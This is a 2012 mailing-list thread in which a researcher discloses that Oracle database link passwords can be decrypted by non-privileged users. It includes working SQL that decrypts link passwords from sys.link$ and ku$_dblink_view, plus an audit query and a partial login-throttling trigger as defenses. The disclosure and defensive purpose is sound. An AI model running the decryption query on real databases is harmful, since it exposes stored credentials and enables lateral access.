Hi **** Your question below is a good one, as I have had a number of other direct offline emails about the same topic since my original posting, which I will answer here in one go. The solution proposed of restricting access to sys.link$ is the well known remediation - but it does not solve this issue unfortunately, as you will see below the dblink ciphertexts are selectable through ku$_dblink_view as well, hence the wider visibility of the link passwords. SQL> select name, userid, utl_raw.cast_to_varchar2(dbms_crypto.decrypt((substr(passwordx,19)), 4353, (substr(passwordx,3,16)))) passwd from ku$_dblink_view; NAME -------------------------------------------------------------------------------- USERID ------------------------------ PASSWD -------------------------------------------------------------------------------- TEST_LINK.ENTERPRISE.INTERNAL.UK DBLINK_ACCOUNT mongo (11.2.0.1) I will be presenting additional new research, exclusive to UKOUG, on Monday. Cheers, Paul http://2012.ukoug.org/default.asp?p=9339&dlgact=shwprs&prs_prsid=7736&day_dayid=62 On 11/27/2012, "********" <*********@*****.com> wrote: >Hi Paul >Could you share the paper if that is ok. >I am interested in the automated solution for the db link security issue. >ONe thing is basically restrict access to link$. > >Thank you >**** > > > >On Sun, Nov 25, 2012 at 12:18 PM, <oracle@xxxxxxxxxxxxx> wrote: > >> >> So, users can decrypt dblink passwords as the key is included in the >> ciphertext... --> >> >> SQL> select name, userid, >> utl_raw.cast_to_varchar2(dbms_crypto.decrypt((substr(passwordx,19)), >> 4353, (substr(passwordx,3,16)))) from sys.link$ where name='TEST_LINK'; >> >> NAME >> >> -------------------------------------------------------------------------------- >> USERID >> ------------------------------ >> PASSWORD >> >> -------------------------------------------------------------------------------- >> TEST_LINK >> DBLINK_ACCOUNT >> MYPW >> >> ..one saving grace is that we can now identify incoming db links using >> this.. >> >> select userid, terminal, comment$text from sys.aud$ where comment$text >> like 'DBLINK%'; >> USERID NTIMESTAMP# USERHOST COMMENT$TEXT >> ------------ ----------------- ------- -------------- >> DBLINK_ACCOUNT 19-NOV-12 01.42.16.305194000 orlin DBLINK_INFO: >> (SOURCE_GLOBAL_NAME=orcl.4294967295) >> >> -->could be too late though so best to take a few precautions in >> advance... preferably automated... >> >> ..Same with lack of profiles on SYS account. Sometimes easier to fix >> ourselves.. >> >> create or replace trigger sys_throttler.tra_servererror_ora1017 >> after servererror on database >> declare >> l_db_usr varchar2 (32); -- //www.freelists.org/webpage/oracle-l